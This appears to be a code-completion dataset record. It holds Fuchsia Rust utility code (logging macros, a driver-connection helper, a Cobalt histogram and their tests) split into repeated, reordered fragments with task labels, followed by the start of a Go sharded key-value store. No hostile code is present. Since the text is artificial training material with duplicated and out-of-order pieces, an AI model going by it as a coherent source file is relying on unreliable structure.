let json = json::from_reader(BufReader::new(File::open(path).unwrap())).unwrap();
(file_path, json)
})
.collect::<Vec<_>>();
assert!(config_files.len() > 0, "No config files found");
for (file_path, config_file) in config_files {
test_config_file(&config_file).context(format!("Failed for file {}", file_path))?;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
/// CobaltIntHistogram: tests that data added to the CobaltIntHistogram is correctly counted and
/// bucketed.
#[test]
fn test_cobalt_histogram_data() {
// Create the histogram and verify initial data count is 0
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 50,
step_size: 10,
num_buckets: 3,
});
assert_eq!(hist.count(), 0);
// Add some arbitrary values, making sure some do not land on the bucket boundary to further
// verify the bucketing logic
hist.add_data(50);
hist.add_data(65);
hist.add_data(75);
hist.add_data(79);
// Verify the values were counted and bucketed properly
assert_eq!(hist.count(), 4);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 2 },
HistogramBucket { index: 4, count: 0 } // overflow
]
);
// Verify `clear` works as expected
hist.clear();
assert_eq!(hist.count(), 0);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 0 },
HistogramBucket { index: 2, count: 0 },
HistogramBucket { index: 3, count: 0 },
HistogramBucket { index: 4, count: 0 }, // overflow
]
);
}
/// CobaltIntHistogram: tests that invalid data values are logged in the correct
/// underflow/overflow buckets.
#[test]
fn test_cobalt_histogram_invalid_data() {
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 0,
step_size: 1,
num_buckets: 2,
});
hist.add_data(-2);
hist.add_data(-1);
hist.add_data(0);
hist.add_data(1);
hist.add_data(2);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 2 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 1 } // overflow
]
);
}
/// Tests that the `get_current_timestamp` function returns the expected current timestamp.
#[test]
fn test_get_current_timestamp() {
use crate::types::Nanoseconds;
let exec = fuchsia_async::TestExecutor::new_with_fake_time().unwrap();
exec.set_fake_time(fuchsia_async::Time::from_nanos(0));
assert_eq!(get_current_timestamp(), Nanoseconds(0));
exec.set_fake_time(fuchsia_async::Time::from_nanos(1000));
assert_eq!(get_current_timestamp(), Nanoseconds(1000));
}
}
| {
device_watcher::recursive_wait_and_open_node(
&io_util::open_directory_in_namespace(
"/dev",
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
)?,
path,
)
.await
} | identifier_body |
utils.rs | // Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/// Logs an error message if the passed in `result` is an error.
#[macro_export]
macro_rules! log_if_err {
($result:expr, $log_prefix:expr) => {
if let Err(e) = $result.as_ref() {
log::error!("{}: {}", $log_prefix, e);
}
};
}
/// Logs an error message if the provided `cond` evaluates to false. Also passes the same expression
/// and message into `debug_assert!`, which will panic if debug assertions are enabled.
#[macro_export]
macro_rules! log_if_false_and_debug_assert {
($cond:expr, $msg:expr) => {
if !($cond) {
log::error!($msg);
debug_assert!($cond, $msg);
}
};
($cond:expr, $fmt:expr, $($arg:tt)+) => {
if !($cond) {
log::error!($fmt, $($arg)+);
debug_assert!($cond, $fmt, $($arg)+);
}
};
}
#[cfg(test)]
mod log_err_with_debug_assert_tests {
use crate::log_if_false_and_debug_assert;
/// Tests that `log_if_false_and_debug_assert` panics for a false expression when debug
/// assertions are enabled.
#[test]
#[should_panic(expected = "this will panic")]
#[cfg(debug_assertions)]
fn test_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will panic");
}
/// Tests that `log_if_false_and_debug_assert` does not panic for a false expression when debug
/// assertions are not enabled.
#[test]
#[cfg(not(debug_assertions))]
fn test_non_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will not panic either");
}
}
/// Export the `connect_to_driver` function to be used throughout the crate.
pub use connect_to_driver::connect_to_driver;
mod connect_to_driver {
use anyhow::{format_err, Error};
use fidl::endpoints::Proxy as _;
use fidl_fuchsia_io::{NodeProxy, OPEN_RIGHT_READABLE, OPEN_RIGHT_WRITABLE};
/// Returns a NodeProxy opened at `path`. The path is guaranteed to exist before the connection
/// is opened.
async fn connect_channel(path: &str) -> Result<NodeProxy, Error> {
device_watcher::recursive_wait_and_open_node(
&io_util::open_directory_in_namespace(
"/dev",
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
)?,
path,
)
.await
}
/// Connects to the driver at `path`, returning a proxy of the specified type. The path is
/// guaranteed to exist before the connection is opened.
///
/// TODO(fxbug.dev/81378): factor this function out to a common library
pub async fn connect_to_driver<T: fidl::endpoints::ProtocolMarker>(
path: &str,
) -> Result<T::Proxy, Error> {
match path.strip_prefix("/dev/") {
Some(path) => fidl::endpoints::ClientEnd::<T>::new(
connect_channel(path)
.await?
.into_channel()
.map_err(|_| format_err!("into_channel failed on NodeProxy"))?
.into_zx_channel(),
)
.into_proxy()
.map_err(Into::into),
None => Err(format_err!("Path must start with /dev/")),
}
}
#[cfg(test)]
mod tests {
use super::*;
use async_utils::PollExt as _;
use fidl::endpoints::{create_proxy, Proxy, ServerEnd};
use fidl_fuchsia_io::{
DirectoryMarker, NodeMarker, MODE_TYPE_DIRECTORY, OPEN_RIGHT_READABLE,
OPEN_RIGHT_WRITABLE,
};
use fuchsia_async as fasync;
use futures::TryStreamExt as _;
use std::sync::Arc;
use vfs::{
directory::entry::DirectoryEntry, directory::helper::DirectlyMutable,
execution_scope::ExecutionScope, file::vmo::read_only_static, pseudo_directory,
};
fn bind_to_dev(dir: Arc<dyn DirectoryEntry>) {
let (dir_proxy, dir_server) = create_proxy::<DirectoryMarker>().unwrap();
let scope = ExecutionScope::new();
dir.open(
scope,
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
MODE_TYPE_DIRECTORY,
vfs::path::Path::dot(),
ServerEnd::new(dir_server.into_channel()),
);
let ns = fdio::Namespace::installed().unwrap();
ns.bind("/dev", dir_proxy.into_channel().unwrap().into_zx_channel()).unwrap();
}
/// Tests that `connect_to_driver` returns success for the valid existing path.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_success() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => pseudo_directory! {
"000" => read_only_static("string beans")
}
}
});
connect_to_driver::<NodeMarker>("/dev/class/thermal/000").await.unwrap();
}
/// Tests that `connect_to_driver` doesn't return until the required path is added.
#[test]
fn test_connect_to_driver_late_add() {
let mut executor = fasync::TestExecutor::new().unwrap();
let thermal_dir = pseudo_directory! {
"000" => read_only_static("string cheese (cheddar)")
};
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => thermal_dir.clone()
}
});
let connect_future =
&mut Box::pin(connect_to_driver::<NodeMarker>("/dev/class/thermal/001"));
// The required path is initially not present
assert!(executor.run_until_stalled(connect_future).is_pending());
// Add the required path
thermal_dir.add_entry("001", read_only_static("string cheese (mozzarella)")).unwrap();
// Verify the wait future now returns successfully
assert!(executor.run_until_stalled(connect_future).unwrap().is_ok());
}
/// Tests that `connect_to_driver` correctly waits even if the required parent directory
/// does not yet exist.
#[test]
fn test_connect_to_driver_nonexistent_parent_dir() {
let mut executor = fasync::TestExecutor::new().unwrap();
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("shoestring fries")
}
}
});
assert!(executor
.run_until_stalled(&mut Box::pin(connect_to_driver::<NodeMarker>(
"/dev/class/thermal/000"
)))
.is_pending());
}
/// Tests that the proxy returned by `connect_to_driver` is usable for sending a FIDL
/// request.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_gives_usable_proxy() {
use fidl_fuchsia_device as fdev;
// Create a pseudo directory with a fuchsia.device.Controller FIDL server hosted at
// class/fake_dev_controller and bind it to our /dev
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory! {
"fake_dev_controller" => vfs::service::host(
move |mut stream: fdev::ControllerRequestStream| {
async move {
match stream.try_next().await.unwrap() {
Some(fdev::ControllerRequest::GetCurrentPerformanceState {
responder
}) => {
let _ = responder.send(8);
}
e => panic!("Unexpected request: {:?}", e),
}
}
}
)
}
});
// Connect to the driver and call GetCurrentPerformanceState on it
let result = crate::utils::connect_to_driver::<fdev::ControllerMarker>(
"/dev/class/fake_dev_controller",
)
.await
.expect("Failed to connect to driver")
.get_current_performance_state()
.await
.expect("get_current_performance_state FIDL failed");
// Verify we receive the expected result
assert_eq!(result, 8);
}
/// Verifies that invalid arguments are rejected while valid ones are accepted.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_valid_path() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("stringtown population 1")
}
}
});
connect_to_driver::<NodeMarker>("/svc/fake_service").await.unwrap_err();
connect_to_driver::<NodeMarker>("/dev/class/cpu/000").await.unwrap();
}
}
}
/// The number of nanoseconds since the system was powered on.
pub fn get_current_timestamp() -> crate::types::Nanoseconds {
crate::types::Nanoseconds(fuchsia_async::Time::now().into_nanos())
}
use fidl_fuchsia_cobalt::HistogramBucket;
/// Convenient wrapper for creating and storing an integer histogram to use with Cobalt.
pub struct CobaltIntHistogram {
/// Underlying histogram data storage.
data: Vec<HistogramBucket>,
/// Number of data values that have been added to the histogram.
data_count: u32,
/// Histogram configuration parameters.
config: CobaltIntHistogramConfig,
}
/// Histogram configuration parameters used by CobaltIntHistogram.
pub struct CobaltIntHistogramConfig {
pub floor: i64,
pub num_buckets: u32,
pub step_size: u32,
}
impl CobaltIntHistogram {
/// Create a new CobaltIntHistogram.
pub fn new(config: CobaltIntHistogramConfig) -> Self {
Self { data: Self::new_vec(config.num_buckets), data_count: 0, config }
}
/// Create a new Vec<HistogramBucket> that represents the underlying histogram storage. Two
/// extra buckets are added for underflow and overflow.
fn new_vec(num_buckets: u32) -> Vec<HistogramBucket> {
(0..num_buckets + 2).map(|i| HistogramBucket { index: i, count: 0 }).collect()
}
/// Add a data value to the histogram.
pub fn add_data(&mut self, n: i64) {
// Add one to index to account for underflow bucket at index 0
let mut index = 1 + (n - self.config.floor) / self.config.step_size as i64;
// Clamp index to 0 and self.data.len() - 1, which Cobalt uses for underflow and overflow,
// respectively
index = num_traits::clamp(index, 0, self.data.len() as i64 - 1);
self.data[index as usize].count += 1;
self.data_count += 1;
}
/// Get the number of data elements that have been added to the histogram.
pub fn count(&self) -> u32 {
self.data_count
}
/// Clear the histogram.
pub fn clear(&mut self) {
self.data = Self::new_vec(self.config.num_buckets);
self.data_count = 0;
}
/// Get the underlying Vec<HistogramBucket> of the histogram.
pub fn get_data(&self) -> Vec<HistogramBucket> {
self.data.clone()
}
}
// Finds all of the node config files under the test package's "/config/data" directory. The node
// config files are identified by a suffix of "node_config.json". The function then calls the
// provided `test_config_file` function for each found config file, passing the JSON structure in as
// an argument. The function returns success if each call to `test_config_file` succeeds. Otherwise,
// the first error encountered is returned.
#[cfg(test)]
pub fn test_each_node_config_file(
test_config_file: impl Fn(&Vec<serde_json::Value>) -> Result<(), anyhow::Error>,
) -> Result<(), anyhow::Error> {
use anyhow::Context as _;
use serde_json as json;
use std::fs;
use std::fs::File;
use std::io::BufReader;
let config_files = fs::read_dir("/config/data")
.unwrap()
.filter(|f| f.as_ref().unwrap().file_name().to_str().unwrap().ends_with("node_config.json"))
.map(|f| {
let path = f.unwrap().path();
let file_path = path.to_str().unwrap().to_string();
let json = json::from_reader(BufReader::new(File::open(path).unwrap())).unwrap();
(file_path, json)
})
.collect::<Vec<_>>();
assert!(config_files.len() > 0, "No config files found");
for (file_path, config_file) in config_files {
test_config_file(&config_file).context(format!("Failed for file {}", file_path))?;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
/// CobaltIntHistogram: tests that data added to the CobaltIntHistogram is correctly counted and
/// bucketed.
#[test]
fn test_cobalt_histogram_data() {
// Create the histogram and verify initial data count is 0
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 50,
step_size: 10,
num_buckets: 3,
});
assert_eq!(hist.count(), 0); | // verify the bucketing logic
hist.add_data(50);
hist.add_data(65);
hist.add_data(75);
hist.add_data(79);
// Verify the values were counted and bucketed properly
assert_eq!(hist.count(), 4);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 2 },
HistogramBucket { index: 4, count: 0 } // overflow
]
);
// Verify `clear` works as expected
hist.clear();
assert_eq!(hist.count(), 0);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 0 },
HistogramBucket { index: 2, count: 0 },
HistogramBucket { index: 3, count: 0 },
HistogramBucket { index: 4, count: 0 }, // overflow
]
);
}
/// CobaltIntHistogram: tests that invalid data values are logged in the correct
/// underflow/overflow buckets.
#[test]
fn test_cobalt_histogram_invalid_data() {
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 0,
step_size: 1,
num_buckets: 2,
});
hist.add_data(-2);
hist.add_data(-1);
hist.add_data(0);
hist.add_data(1);
hist.add_data(2);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 2 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 1 } // overflow
]
);
}
/// Tests that the `get_current_timestamp` function returns the expected current timestamp.
#[test]
fn test_get_current_timestamp() {
use crate::types::Nanoseconds;
let exec = fuchsia_async::TestExecutor::new_with_fake_time().unwrap();
exec.set_fake_time(fuchsia_async::Time::from_nanos(0));
assert_eq!(get_current_timestamp(), Nanoseconds(0));
exec.set_fake_time(fuchsia_async::Time::from_nanos(1000));
assert_eq!(get_current_timestamp(), Nanoseconds(1000));
}
} |
// Add some arbitrary values, making sure some do not land on the bucket boundary to further | random_line_split |
utils.rs | // Copyright 2020 The Fuchsia Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
/// Logs an error message if the passed in `result` is an error.
#[macro_export]
macro_rules! log_if_err {
($result:expr, $log_prefix:expr) => {
if let Err(e) = $result.as_ref() {
log::error!("{}: {}", $log_prefix, e);
}
};
}
/// Logs an error message if the provided `cond` evaluates to false. Also passes the same expression
/// and message into `debug_assert!`, which will panic if debug assertions are enabled.
#[macro_export]
macro_rules! log_if_false_and_debug_assert {
($cond:expr, $msg:expr) => {
if !($cond) {
log::error!($msg);
debug_assert!($cond, $msg);
}
};
($cond:expr, $fmt:expr, $($arg:tt)+) => {
if !($cond) {
log::error!($fmt, $($arg)+);
debug_assert!($cond, $fmt, $($arg)+);
}
};
}
#[cfg(test)]
mod log_err_with_debug_assert_tests {
use crate::log_if_false_and_debug_assert;
/// Tests that `log_if_false_and_debug_assert` panics for a false expression when debug
/// assertions are enabled.
#[test]
#[should_panic(expected = "this will panic")]
#[cfg(debug_assertions)]
fn test_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will panic");
}
/// Tests that `log_if_false_and_debug_assert` does not panic for a false expression when debug
/// assertions are not enabled.
#[test]
#[cfg(not(debug_assertions))]
fn test_non_debug_assert() {
log_if_false_and_debug_assert!(true, "this will not panic");
log_if_false_and_debug_assert!(false, "this will not panic either");
}
}
/// Export the `connect_to_driver` function to be used throughout the crate.
pub use connect_to_driver::connect_to_driver;
mod connect_to_driver {
use anyhow::{format_err, Error};
use fidl::endpoints::Proxy as _;
use fidl_fuchsia_io::{NodeProxy, OPEN_RIGHT_READABLE, OPEN_RIGHT_WRITABLE};
/// Returns a NodeProxy opened at `path`. The path is guaranteed to exist before the connection
/// is opened.
async fn connect_channel(path: &str) -> Result<NodeProxy, Error> {
device_watcher::recursive_wait_and_open_node(
&io_util::open_directory_in_namespace(
"/dev",
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
)?,
path,
)
.await
}
/// Connects to the driver at `path`, returning a proxy of the specified type. The path is
/// guaranteed to exist before the connection is opened.
///
/// TODO(fxbug.dev/81378): factor this function out to a common library
pub async fn connect_to_driver<T: fidl::endpoints::ProtocolMarker>(
path: &str,
) -> Result<T::Proxy, Error> {
match path.strip_prefix("/dev/") {
Some(path) => fidl::endpoints::ClientEnd::<T>::new(
connect_channel(path)
.await?
.into_channel()
.map_err(|_| format_err!("into_channel failed on NodeProxy"))?
.into_zx_channel(),
)
.into_proxy()
.map_err(Into::into),
None => Err(format_err!("Path must start with /dev/")),
}
}
#[cfg(test)]
mod tests {
use super::*;
use async_utils::PollExt as _;
use fidl::endpoints::{create_proxy, Proxy, ServerEnd};
use fidl_fuchsia_io::{
DirectoryMarker, NodeMarker, MODE_TYPE_DIRECTORY, OPEN_RIGHT_READABLE,
OPEN_RIGHT_WRITABLE,
};
use fuchsia_async as fasync;
use futures::TryStreamExt as _;
use std::sync::Arc;
use vfs::{
directory::entry::DirectoryEntry, directory::helper::DirectlyMutable,
execution_scope::ExecutionScope, file::vmo::read_only_static, pseudo_directory,
};
fn bind_to_dev(dir: Arc<dyn DirectoryEntry>) {
let (dir_proxy, dir_server) = create_proxy::<DirectoryMarker>().unwrap();
let scope = ExecutionScope::new();
dir.open(
scope,
OPEN_RIGHT_READABLE | OPEN_RIGHT_WRITABLE,
MODE_TYPE_DIRECTORY,
vfs::path::Path::dot(),
ServerEnd::new(dir_server.into_channel()),
);
let ns = fdio::Namespace::installed().unwrap();
ns.bind("/dev", dir_proxy.into_channel().unwrap().into_zx_channel()).unwrap();
}
/// Tests that `connect_to_driver` returns success for the valid existing path.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_success() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => pseudo_directory! {
"000" => read_only_static("string beans")
}
}
});
connect_to_driver::<NodeMarker>("/dev/class/thermal/000").await.unwrap();
}
/// Tests that `connect_to_driver` doesn't return until the required path is added.
#[test]
fn test_connect_to_driver_late_add() {
let mut executor = fasync::TestExecutor::new().unwrap();
let thermal_dir = pseudo_directory! {
"000" => read_only_static("string cheese (cheddar)")
};
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"thermal" => thermal_dir.clone()
}
});
let connect_future =
&mut Box::pin(connect_to_driver::<NodeMarker>("/dev/class/thermal/001"));
// The required path is initially not present
assert!(executor.run_until_stalled(connect_future).is_pending());
// Add the required path
thermal_dir.add_entry("001", read_only_static("string cheese (mozzarella)")).unwrap();
// Verify the wait future now returns successfully
assert!(executor.run_until_stalled(connect_future).unwrap().is_ok());
}
/// Tests that `connect_to_driver` correctly waits even if the required parent directory
/// does not yet exist.
#[test]
fn test_connect_to_driver_nonexistent_parent_dir() {
let mut executor = fasync::TestExecutor::new().unwrap();
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("shoestring fries")
}
}
});
assert!(executor
.run_until_stalled(&mut Box::pin(connect_to_driver::<NodeMarker>(
"/dev/class/thermal/000"
)))
.is_pending());
}
/// Tests that the proxy returned by `connect_to_driver` is usable for sending a FIDL
/// request.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_gives_usable_proxy() {
use fidl_fuchsia_device as fdev;
// Create a pseudo directory with a fuchsia.device.Controller FIDL server hosted at
// class/fake_dev_controller and bind it to our /dev
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory! {
"fake_dev_controller" => vfs::service::host(
move |mut stream: fdev::ControllerRequestStream| {
async move {
match stream.try_next().await.unwrap() {
Some(fdev::ControllerRequest::GetCurrentPerformanceState {
responder
}) => {
let _ = responder.send(8);
}
e => panic!("Unexpected request: {:?}", e),
}
}
}
)
}
});
// Connect to the driver and call GetCurrentPerformanceState on it
let result = crate::utils::connect_to_driver::<fdev::ControllerMarker>(
"/dev/class/fake_dev_controller",
)
.await
.expect("Failed to connect to driver")
.get_current_performance_state()
.await
.expect("get_current_performance_state FIDL failed");
// Verify we receive the expected result
assert_eq!(result, 8);
}
/// Verifies that invalid arguments are rejected while valid ones are accepted.
#[fasync::run_singlethreaded(test)]
async fn test_connect_to_driver_valid_path() {
bind_to_dev(pseudo_directory! {
"class" => pseudo_directory!{
"cpu" => pseudo_directory! {
"000" => read_only_static("stringtown population 1")
}
}
});
connect_to_driver::<NodeMarker>("/svc/fake_service").await.unwrap_err();
connect_to_driver::<NodeMarker>("/dev/class/cpu/000").await.unwrap();
}
}
}
/// The number of nanoseconds since the system was powered on.
pub fn get_current_timestamp() -> crate::types::Nanoseconds {
crate::types::Nanoseconds(fuchsia_async::Time::now().into_nanos())
}
use fidl_fuchsia_cobalt::HistogramBucket;
/// Convenient wrapper for creating and storing an integer histogram to use with Cobalt.
pub struct CobaltIntHistogram {
/// Underlying histogram data storage.
data: Vec<HistogramBucket>,
/// Number of data values that have been added to the histogram.
data_count: u32,
/// Histogram configuration parameters.
config: CobaltIntHistogramConfig,
}
/// Histogram configuration parameters used by CobaltIntHistogram.
pub struct CobaltIntHistogramConfig {
pub floor: i64,
pub num_buckets: u32,
pub step_size: u32,
}
impl CobaltIntHistogram {
/// Create a new CobaltIntHistogram.
pub fn new(config: CobaltIntHistogramConfig) -> Self {
Self { data: Self::new_vec(config.num_buckets), data_count: 0, config }
}
/// Create a new Vec<HistogramBucket> that represents the underlying histogram storage. Two
/// extra buckets are added for underflow and overflow.
fn | (num_buckets: u32) -> Vec<HistogramBucket> {
(0..num_buckets + 2).map(|i| HistogramBucket { index: i, count: 0 }).collect()
}
/// Add a data value to the histogram.
pub fn add_data(&mut self, n: i64) {
// Add one to index to account for underflow bucket at index 0
let mut index = 1 + (n - self.config.floor) / self.config.step_size as i64;
// Clamp index to 0 and self.data.len() - 1, which Cobalt uses for underflow and overflow,
// respectively
index = num_traits::clamp(index, 0, self.data.len() as i64 - 1);
self.data[index as usize].count += 1;
self.data_count += 1;
}
/// Get the number of data elements that have been added to the histogram.
pub fn count(&self) -> u32 {
self.data_count
}
/// Clear the histogram.
pub fn clear(&mut self) {
self.data = Self::new_vec(self.config.num_buckets);
self.data_count = 0;
}
/// Get the underlying Vec<HistogramBucket> of the histogram.
pub fn get_data(&self) -> Vec<HistogramBucket> {
self.data.clone()
}
}
// Finds all of the node config files under the test package's "/config/data" directory. The node
// config files are identified by a suffix of "node_config.json". The function then calls the
// provided `test_config_file` function for each found config file, passing the JSON structure in as
// an argument. The function returns success if each call to `test_config_file` succeeds. Otherwise,
// the first error encountered is returned.
#[cfg(test)]
pub fn test_each_node_config_file(
test_config_file: impl Fn(&Vec<serde_json::Value>) -> Result<(), anyhow::Error>,
) -> Result<(), anyhow::Error> {
use anyhow::Context as _;
use serde_json as json;
use std::fs;
use std::fs::File;
use std::io::BufReader;
let config_files = fs::read_dir("/config/data")
.unwrap()
.filter(|f| f.as_ref().unwrap().file_name().to_str().unwrap().ends_with("node_config.json"))
.map(|f| {
let path = f.unwrap().path();
let file_path = path.to_str().unwrap().to_string();
let json = json::from_reader(BufReader::new(File::open(path).unwrap())).unwrap();
(file_path, json)
})
.collect::<Vec<_>>();
assert!(config_files.len() > 0, "No config files found");
for (file_path, config_file) in config_files {
test_config_file(&config_file).context(format!("Failed for file {}", file_path))?;
}
Ok(())
}
#[cfg(test)]
mod tests {
use super::*;
/// CobaltIntHistogram: tests that data added to the CobaltIntHistogram is correctly counted and
/// bucketed.
#[test]
fn test_cobalt_histogram_data() {
// Create the histogram and verify initial data count is 0
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 50,
step_size: 10,
num_buckets: 3,
});
assert_eq!(hist.count(), 0);
// Add some arbitrary values, making sure some do not land on the bucket boundary to further
// verify the bucketing logic
hist.add_data(50);
hist.add_data(65);
hist.add_data(75);
hist.add_data(79);
// Verify the values were counted and bucketed properly
assert_eq!(hist.count(), 4);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 2 },
HistogramBucket { index: 4, count: 0 } // overflow
]
);
// Verify `clear` works as expected
hist.clear();
assert_eq!(hist.count(), 0);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 0 }, // underflow
HistogramBucket { index: 1, count: 0 },
HistogramBucket { index: 2, count: 0 },
HistogramBucket { index: 3, count: 0 },
HistogramBucket { index: 4, count: 0 }, // overflow
]
);
}
/// CobaltIntHistogram: tests that invalid data values are logged in the correct
/// underflow/overflow buckets.
#[test]
fn test_cobalt_histogram_invalid_data() {
let mut hist = CobaltIntHistogram::new(CobaltIntHistogramConfig {
floor: 0,
step_size: 1,
num_buckets: 2,
});
hist.add_data(-2);
hist.add_data(-1);
hist.add_data(0);
hist.add_data(1);
hist.add_data(2);
assert_eq!(
hist.get_data(),
vec![
HistogramBucket { index: 0, count: 2 }, // underflow
HistogramBucket { index: 1, count: 1 },
HistogramBucket { index: 2, count: 1 },
HistogramBucket { index: 3, count: 1 } // overflow
]
);
}
/// Tests that the `get_current_timestamp` function returns the expected current timestamp.
#[test]
fn test_get_current_timestamp() {
use crate::types::Nanoseconds;
let exec = fuchsia_async::TestExecutor::new_with_fake_time().unwrap();
exec.set_fake_time(fuchsia_async::Time::from_nanos(0));
assert_eq!(get_current_timestamp(), Nanoseconds(0));
exec.set_fake_time(fuchsia_async::Time::from_nanos(1000));
assert_eq!(get_current_timestamp(), Nanoseconds(1000));
}
}
| new_vec | identifier_name |
put.go | package utility
import (
"bytes"
"encoding/json"
"fmt"
"io/ioutil"
"net/http"
"time"
"github.com/gin-gonic/gin"
)
const (
keyLimit int = 50 // maximum number of characters allowed for a key
)
type StoreVal struct {
Value string `json:"value"`
CausalMetadata []int `json:"causal-metadata"`
}
// struct designed for decoding JSON data received from a node in a different shard
type fromNode struct {
Message string `json:"message"`
CausalMetadata []int `json:"causal-metadata"`
ShardId int `json:"shard-id"`
}
func canDeliver(senderVC []int, replicaVC []int, view []string) bool {
// conditions for delivery:
// senderVC[senderslot] = replicaVC[senderslot] + 1
// senderVC[notsender] <= replicaVC[not sender]
senderID := senderVC[len(view)] // sender position in VC
for i := 0; i < len(view); i++ {
//if sender clock isn't updated by 1 more
if i == senderID && senderVC[i] != replicaVC[i]+1 {
return false
} else if i != senderID && senderVC[i] > replicaVC[i] { //if something else than the sender incremented clock
fmt.Println("canDeliver: WE CAN'T DELIVER!!")
return false
}
}
//Otherwise, our clock is only a difference of 1 in senderID slot between the currentVC and the senderVC
return true
}
func max(x int, y int) int {
if x < y {
return y
}
return x
}
// calculate new VC: max(senderVC, replicaVC)
func updateVC(senderVC []int, replicaVC []int, view []string) []int {
newVC := make([]int, len(view))
for i := 0; i < len(view); i++ {
fmt.Printf("SENDERVC: %v\n", senderVC)
fmt.Printf("REPLICAVC: %v\n", replicaVC)
newVC[i] = max(senderVC[i], replicaVC[i])
}
return newVC
}
//compareVC
//which clock is bigger/max? which can we use?
//return sum total of vector clock
func compareVC(leftVC []int, rightVC []int, view []string) []int {
leftSum := 0
rightSum := 0
for i := 0; i < len(view); i++ {
leftSum += leftVC[i]
rightSum += rightVC[i]
}
if leftSum > rightSum {
return leftVC
}
return rightVC
}
func updateKvStore(view []string, dict map[string]StoreVal, currVC []int, s *SharedShardInfo) {
//get updated kvstore from other nodes in the current shard
newStoreVal := make(map[string]StoreVal)
Mu.Mutex.Lock()
for i := 0; i < len(s.ShardMembers[s.CurrentShard]); i++ {
newStoreVal = KvGet(s.ShardMembers[s.CurrentShard][i])
if len(newStoreVal) > 0 {
break
}
}
Mu.Mutex.Unlock()
//Update local vector clock
for _, value := range newStoreVal {
currVC = compareVC(currVC, value.CausalMetadata, view)
}
Mu.Mutex.Lock()
//replace our KVStore with the new one if we get a change
for key, storeVal := range newStoreVal {
_, exists := dict[key]
if !exists { // if the key doesn't exist in the store, then add it
dict[fmt.Sprint(key)] = StoreVal{Value: storeVal.Value, CausalMetadata: storeVal.CausalMetadata}
}
}
Mu.Mutex.Unlock()
}
// puts the current kv pair into the current store if the key-to-shard mapping strategy
// is the current shard id, otherwise, forward it to one of the nodes with the hashed shard id
func ShardPutStore(s *SharedShardInfo, view *View, store map[string]StoreVal, localAddr int, currVC []int) {
var (
d StoreVal
fn fromNode
)
s.Router.PUT("/key-value-store/:key", func(c *gin.Context) {
key := c.Param("key")
// body := c.Request.Body
data, _ := ioutil.ReadAll(c.Request.Body)
strBody := string(data[:])
json.Unmarshal(data, &d)
defer c.Request.Body.Close()
shardId := HashModN(key, s.ShardCount)
| //If causal metadata is sent from client, we need to update the KVStore/check if we can deliver
//Assume we can't so just update each time
if len(d.CausalMetadata) > 0 {
updateKvStore(view.PersonalView, store, currVC, s)
} else if len(d.CausalMetadata) == 0 {
Mu.Mutex.Lock()
d.CausalMetadata = make([]int, len(view.PersonalView))
for index := range view.PersonalView {
d.CausalMetadata[index] = 0
}
Mu.Mutex.Unlock()
}
// increment on receive so we send back correct causal clock
d.CausalMetadata[localAddr]++
d.CausalMetadata = append(d.CausalMetadata, localAddr) //Index of sender address
currVC = d.CausalMetadata
fmt.Printf("***CHECK shardId, s.CurrentShard, d.Val, & d.causalmetadata: %v, %v, (%v, %v)****", shardId, s.CurrentShard, d.Value, d.CausalMetadata)
